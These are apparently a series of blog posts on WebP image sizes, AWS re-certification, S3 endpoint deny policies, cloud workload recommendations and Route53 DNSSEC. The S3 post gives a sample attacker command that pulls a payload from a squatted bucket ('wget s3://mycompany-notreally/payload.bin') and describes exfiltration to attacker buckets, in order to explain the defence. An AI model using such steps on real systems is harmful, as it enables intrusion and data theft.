Image formats: WebP wins!

I recently imported a PDF image into the open source GNU Image Manipulation Program, also called The GIMP, edited it, and wanted to save the output to a format that I can use natively online.

The rendered image is 1458 by 1126.

Historically I would have chosen JPEG if it was a picture with lots of different colours, or a PNG if it had specific colours or any Alpha channel (transparency). In this case, I chose both of the above, and the new kid on the block, webp.

I chose a 60% quality setting for both the JPEG and WebP formats, and while I can’t tell the difference visually, I can on disk.

FormatBitsDPIFile size
PDF5,211,365
JPG3210076,178
PNG24412,813
WebP327232,768
File formats compared

The clear winner here is WebP on file size. Its some 56% smaller than JPEG, and 92% smaller than the PNG.

WebP was originally proposed in 2010, but libraries took a long time to be created, and then incorporated into browsers and native OS.

Today, Chrome, Edge, Firefox, Safari, Brave and more support it. As I write this, the CanIUse.com site rates WebP at having 92.13% support.

Not all services you use support the upload of WebP format images at this stage, but that’s something up to the developer community to start to understand, implement and support. The time for this is looking like now!

AWS Re-certification

Time passes, and before you know it, three years have raced past and you get the following email:

Hello James Bromberger,

Your AWS Certified Solutions Architect – Associate is set to expire on Mar 13, 2021.

How to Recertify

To maintain your certification, you must pass the current version of the AWS Certified Solutions Architect – Associate exam. Check out our Recertification Policy for more information and details by certification level.

You have a 50% discount voucher in your AWS Certification Account under the “Benefits” section. If you haven’t done so already, you can apply this voucher to your exam fee to recertify or apply it to any future certification exam you wish to pursue by Mar 13, 2021. Sign in to aws.training/certification to get started.

If you have any questions, please refer to our FAQs or contact us.

Thank you,

AWS Training and Certification

My Solution Architect Professional certification also renews the corresponding subordinate Solution Architect Associate certification, which I first obtained on the 24th of February 2013 as one of the first in the world to sit this.

This reminder email came out exactly one month before expiry, so I have plenty of time to study and prepare.

With the global pandemic effectively shutting down much of the world, next week also marks 12 months since I was on a plane – the purpose for which was to attend an exam certification workshop to write the items (questions) for the… Solution Architect Professional certification, as a Subject Matter Expert. of course, there are many questions in the certification pool, and each candidate gets a random selection. including some questions that are non-scoring and are themselves being tested on candidates.

I often point my Modis AWS Cloud practice member colleagues at the Certification process training course, on the aws.training site. It gives you a great insight to the thoroughness of the process; it’s quite in depth. This should give confidence to candidates that strives to obtain these vendor certifications – they are discerning, and for good reason – to retain value.

Securing VPC S3 Endpoints: Blocking other buckets

What is the new s3:ResourceAccount policy condition for? Security!

AWS Virtual Private Cloud is a wonder of the modern cloud age. While most of the magic is encapsulation, it also has a deep permissions policy that is highly effective in large deployments.

From a security perspective, accessing your S3 private stores by egressing your VPC over the Internet seemed like a control needing to be improved, and this landed with S3 Endpoints (now Gateway Endpoints) in 2015. These Gateway Endpoints rely upon integration into the VPC Routing table, where as the newer Interface Endpoints have network interfaces (ENIs) in designated VPCs. Oh, and Interface Endpoints are charged for (at this time), while the Gateway Endpoints are (again, at this time), complementary.

Having an S3 Endpoint meant that your buckets, as a Resource, could now have a policy applied to them to limit their access to only traffic originating from the given Endpoint(s) or VPC(s). This helps limits the steal of credentials.

But another consideration existing, which endpoints also supported: a filter on the Endpoint itself, limiting the actions and buckets that resources within the VPC were allowed to access from the S3 service.

However the policy language would limit any permit deny role on an S3 Bucket name, and as we know, Buckets can have any name so long as no one else already has that name. Indeed, there is a race here to create names for buckets that other people may want, and Bucket Squatting (on those names) is a thing.

S3 bucket names couldn’t be reserved or namespaced (outside of the existing ARN), and while a policy that denies access to any bucket not called “mycompany-*” could be deployed on the Endpoint, that doesn’t stop an attacker also calling their bucket “mycompany-notreally”.

Why Filter Access to S3

There’s two major reasons why an attacker would want to get access from your resources to S3:

  1. Data ingestion to your network of malware, compilers, large scripts or other tools
  2. Data ex-filtration to their own resource

Lets consider an Instance that has been taken over. Some RAT or execution is happening on your compute at their behest. And perhaps the attacker is aware of some level of VPC S3 Endpoint policy that may be in place.

The ability to put in large complicated scripts, malware and payloads may be limited form the command and control channel, whereas a cal to wget s3://mycompany-notreally/payload.bin may actually succeed in transferring that very large payload to your instance, which it then runs.

And of course in the reverse way, when they want to steal your data, then upload to s3 to a bucket in their control, from which they can later exfil out of S3 separately.

Policies for S3 ARNs

The initial thought is to use an ARN that would filter on something like arn:aws:s3:12345678901::mybucket-*, but alas, Account IDs are not valid in ARNs for S3 ARNs! Today, AWS announced a new condition key that takes care of this, called s3:ResourceAccount. It achieves a similar thing.

Thus, in a CloudFormation template snippet, you can now put:

S3Endpoint:
  Type: 'AWS::EC2::VPCEndpoint'
  Properties:
    PolicyDocument:
      Version: "2012-10-17"
      Statement:
      - Action: s3:*
        Effect: Deny
        Resource: '*'
        Principal: '*'
        Condition:
          StringNotEquals:
            s3:ResourceAccount: !Ref 'AWS::AccountId'
    RouteTableIds:
      - !Ref RouteTablePublic
      - !Ref RouteTableNATGatewayA
      - !Ref RouteTableNATGatewayB
      - !Ref RouteTableNATGatewayC
      - !Ref RouteTablePrivate
    ServiceName: !Join
      - .
      - - com.amazonaws
        - !Ref 'AWS::Region'
        - s3
    VpcId: !Ref VPC

Current AWS Workload recommendations December 2020

There’s a heap of Best Practice around workloads online and in AWS, and here’s some of my current thoughts as at December 2020 – your mileage may vary, caveat emptor, no warranty expressed or implied, and you may have use-cases that justify something different:

PatternRecommendationRationale
Multi-AZ VPCDesign Address space for 4 AZsIn an AZ outage, having just one AZ remaining to satisfy demand during a rush is not enough; using contiguous address space and CIDR masks means after 2, we have 4
VPC DNSSEC validationEnable for VPC Validation, but be ready for external zones to stuff up their DNSSEC keysFailing closed maybe better than failing open; but new failure modes need to be understood.
Route53 Hosted Zone DNSSECHold off until current issues are resolved if you use CloudFrontNew service, new failure modes.
TLS1.2 and above onlyOlder versions are now already removed from many clients; be ready for TLS 1.3 and above only
VPC IPv6Enable for all subnets33% of traffic worldwide is now IPv6; your external interface (ALB/NLB) should all be dual stack now as a minimum. Don’t forget your AAAA Alias DNS records.
VPC External EGRESS for private subnetsMinimise, avoid if possible.You shouldn’t have any boot time or runtime dependencies – apart form the outbound integrations you are explicitly creating. Use ENDPOINTS for S3 and other services. Minimise Internet transit.
CloudFront IPv6Enable for all distributionsAs above; particularly if your origin is only on IPv4; Don’t forget your AAAA Alias DNS records.
HTTP interfacesOnly for the APEX of the domain if you think people will type your address by hand into a browser; for all other services, do not listen on port 80 HTTPAvoid convenience redirects, they are a point of weakness. Use HTTPS for everything, including internal services.
ACM Public TLS CertificatesUse DNS validation, and leave validation in place for subsequent reissueRemove the manual work in renewing and redeploying certificates.
S3 Block Public AccessDo this for every bucket, and if possible, Account-wide AS WELL.Two levels of this in case you have to disable account-wide in future.
S3 Website public (anonymous) hostingDo not use; look at CloudFront with Origin Access IdentityYou can’t get a custom certificate nor control TLS on S3. But beware default document handling and other issues.
S3 Access LoggingEnable, but set a retention policy in the S3 BucketNo logs means no evidence when investigating issues.
CloudFront Access LoggingEnable, but set a retention policy in the S3 BucketNo logs means no evidence when investigating issues.
VPC Flow LogsEnable for all, but set a retention policy in the CloudWatch LogNo logs means no evidence when investigating issues.
DatabaseUse RDS or Aurora wherever possible Less operational overhead
RDS Maintenance; Minor versionsAlways adopt latest minor version pro-actively, from Dev through to ProdDon’t wait for Auto graduand to happen; that’s typically on decommission of the version being available.
RDS Maintenance: Major VersionsAfter testing, move up to latest Major versionAvoid being on a decommissioned major version; the enforced upgrade jump may be a bigger jump forward than your application can support.
RDS Encrypt in flightEnforceEnsure privacy of the credentials for connection regardless of where the client it. Don’t assume the client config to use encryption is correct
RDS Encryption in flightValidateGet the RDS CA certificate(s) in your trust path during application build time. Always automate brining them in (and validate and log where you get these from).
RDS Encryption at restEnableKMS is fine. Use a dedicated key for important workloads (and don’t share the key with other accounts).
DNS RecordsAlways publish a CAA and SPF record, even for parked domainsProtect risk and reputation
HTTP Security HeadersValidate on SecurityHeaders, Hardenize, SSLLabs, Mozilla Observatory, and Google Lighthouse (and possibly more).This is an entire lesson, but an A will get you in good stead.
HTTP Security Headers: HSTSEnforce HSTS for a yearWe’re never going back to unencrypted HTTP
Public CDNs for libraries in major projectsAvoid; host your own assets.Remove external dependencies

DNSSEC and Route53

DNS is one of the last insecure protocols in use. Since 1983 it has helped identify resources on the Internet, with a name space and a hierarchy based upon a common agreed root.

Your local device – your laptop, your phone, your smart TV – whatever you’re using to read this article – typically has been configured with a local DNS resolver that, when your device needs to look up an address, it can ask the local resolver to go find the answer to a query.

The protocol used by your local device to the resolver, and from the resolver to reach out across the Internet, is an unencrypted protocol. It normally runs on UDP port 53, switching to TCP 53 under certain conditions.

There is no privacy across either your local network, or the wider Internet, of what records are being looked up or the responses coming back.

There’s also no validation that the response sent back to the Resolver IS the correct answer. And malicious actors may try to spuriously send invalid responses to your upstream resolver. For example, I could get my laptop on the same WiFi as you, and send UDP packets to the configured resolver telling it that the response to “www.bank.com” is my address, in order to get you to then connect to a fake service I am running, and try and get some data from you (like your username and password). Hopefully your bank is using HTTPS, and the certificate warning you would likely get would be enough to stop you from entering information that I would get.

The solution to this was to use digital signatures (not encryption) to have a verification of the DNS response received by the Upstream resolver from across the Internet. And thus DNSSEC was in born 1997 (23 years ago as at 2020).

The take up has been slow.

Part of this has been the need for each component of a DNS name – each zone – needing to deploy a DNSSEC-capable DNS server to generate the signatures, and then to have each domain be signed.

The public DNS root was signed in 2010, along with some of the original Top Level Domains. Today the Wikipedia page for the Internet TLDs shows a large number of them are signed and ready for their customers to have their DNS domains return DNSSEC results.

Since 2012 US Government agencies have been required by NIST to deploy DNSSEC, but most years agencies opt out of this. Its been too difficult, or the DNS software or service they are using to host their Domain does not support it.

Two parts to DNS SEC

One the one side, the operator of the zone being looked up (and their parent domain) all need to support and have established a chain-of-trust for DNSSEC. If you turn on DNSSEC for your authoritative domain, then those clients who are not validating the responses won’t see any difference.

Separately, the client side DNS Resolver (often deployed by your ISP, Telco, or network provider) needs to understand and validate the DNSSEC Response. If they turn on DNSSEC for your Resolver, then there’s no impact for resolving domains that don’t support DNSSEC.

Both of these need to be in place to offer some form of protection for DNS spoofing, cache poisoning or other attacks.

Route 53 Support for DNSSEC

In December 2020, Route53 finally announced support for DNSSEC, after many years and many customer requests. And this support comes in two ways.

Firstly, there is now a tick box to enable the VPC-provided resolver to validate DNSSEC entries, if they are received. Its either on, or off at this stage.

And separately, for hosted DNS Zones (your domains), you can now enable DNSSEC and have signed responses sent by Route53 for queries to your DNS entries, so they can be validated.

A significant caveat right now (Dec 2020) for hosted zones is that this doesn’t support the customer Route53 ALIAS record type, used for defining custom names for CloudFront Distributions.

DNSSEC Considerations: VPC Resolver

You probably should enable DNSSEC for your VPC resolvers, particularly if you want additional verification that you aren’t being spoofed. There appears to be no additional cost for this, so the only consideration is why not?

The largest risk comes from misconfiguration of the domain names that you are looking up.

In January 2018, the US Government had a shut down due to blocked legislation. Staff walked off the job, and for some of those agencies, they had DNS SEC Deployed – and for at least one of those agencies, its DNS keys expired, rendering their entire domain off-line (many other let their web site TLS certificates expire, causing warnings for browsers, but email still worked for them for example).

So, you should weigh up the improvement in security posture, versus the risk of an interruption through misconfiguration.

In order to enable it, go to the Route53 Console, and navigate to Resolvers -> VPCs.

ChoOse the VPC Resolver, and scroll to the bottom of the page where you’ll see the below check box.

DNSSEC enabled for a VPC

DNSSEC Considerations: Your Hosted Zones

As a managed service, Route53 normally handles all maintenance and operational activities for you. Serving your records with DNSSEC at least gives your customers the opportunity to validate responses (as they enable their validation).

I’d suggest that this is a good thing. However, with the caveat around CloudFront ALIAS records right now, I am choosing not to rush to production hosted zones today, but staying on my non-production and non-mission critical zones.

DNSSEC enabled on a hosted zone

I have always said that your non-production environments should be a leading indicator of the security that will get to production (at some stage), so this approach aligns with this.

The long term impact of Route53 DNSSEC

Route5 is a strategic service that enables customers to not need their own allocate fixed address space and run their own DNS servers (many of which never receive enough security maintenance and updates). With DNSSEC support this means that barriers for adoption are reduced, and indeed, I feel we’ll see an up-tick in DNSSEC deployment worldwide because of this capability coming to Route53.

Other Approaches

An alternate security mechanism being tested now is called DNS over HTTPS, or -DoH. This encrypts the DNS names being requested from the local network provider (they still see the IP addresses being accessed).

In corporate settings, DoH is frowned upon, as many corporate It departments want to inspect and protect staff by blocking certain content at the DNS level (eg, block all lookups for betting sites) – and hiding this in DoH may prevent this.

In the end, a resolver somewhere knows which client looked up what address.